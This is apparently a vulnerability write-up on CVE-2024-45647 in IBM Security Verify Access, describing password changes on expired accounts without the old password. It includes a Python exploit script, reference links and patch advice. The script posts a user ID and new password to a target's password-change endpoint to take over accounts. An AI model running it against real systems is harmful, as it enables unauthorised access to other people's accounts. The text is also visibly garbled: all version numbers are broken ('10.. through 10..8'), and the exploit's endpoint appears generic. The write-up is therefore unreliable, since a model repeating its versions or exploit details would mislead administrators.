A newly discovered security vulnerability, CVE-2024-45647, has been identified in IBM Security Verify Access versions 10.. through 10..8 and IBM Security Verify Access Docker versions 10.. through 10..8. The vulnerability allows an unverified user to change the password of an expired user account without having any knowledge of the original password. This flaw can pose a significant risk to organizations relying on IBM Security Verify Access for user authentication and access management.

The details of this vulnerability, along with a code snippet showcasing the exploit, are provided below, including links to original references and further resources.

Exploit Details

The vulnerabililty CVE-2024-45647 is a result of an incomplete password validation mechanism in the password reset process for expired user accounts. This means that an attacker could simply request a password change for an expired user account without needing to provide the original password.

Upon successful execution of the exploit, the attacker would then gain access to the compromised account with the newly set password. This unauthorized access could facilitate further attacks, such as privilege escalation, data exfiltration or unauthorized modifications to system configurations.

A sample exploit for CVE-2024-45647 could be implemented using the following Python code

import requests

TARGET_URL = "https://target-verify-access.example.com";
USER_ID = "expired_user"
NEW_PASSWORD = "new_password"

password_change_payload = {
    "userId": USER_ID,
    "newPassword": NEW_PASSWORD
}

response = requests.post(f"{TARGET_URL}/password/change", json=password_change_payload)

if response.status_code == 200:
    print(f"Successfully changed the password for {USER_ID}!")
else:
    print(f"Failed to change the password. Response: {response.text}")

This Python script sends a POST request to the target IBM Security Verify Access instance, requesting a password change for the specified expired user account (USER_ID). The password is changed to the value provided in the NEW_PASSWORD variable.

Original References and Resources

1. IBM Security Bulletin: https://www.ibm.com/blogs/psirt/ibm-security-bulletin/CVE-2024-45647
2. CVE Details Page: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45647
3. National Vulnerability Database Entry: https://nvd.nist.gov/vuln/detail/CVE-2024-45647

Mitigation Steps

IBM has released a security patch to fix this vulnerability. Users are advised to upgrade their IBM Security Verify Access installations to version 10..9 or later and IBM Security Verify Access Docker installations to version 10..9 or later.

Additional best practices include regularly auditing user accounts and their status, ensuring that expired accounts are disabled or removed from the system, and monitoring logs for suspicious activity related to password changes.

Conclusion

CVE-2024-45647 is a critical security vulnerability affecting IBM Security Verify Access and IBM Security Verify Access Docker. It allows unverified users to reset the password and gain unauthorized access to expired user accounts. Users of these software products should take immediate action to apply the security patch provided by IBM and follow best practices to minimize the risk of exploit.

Timeline

Published on: 01/20/2025 15:15:07 UTC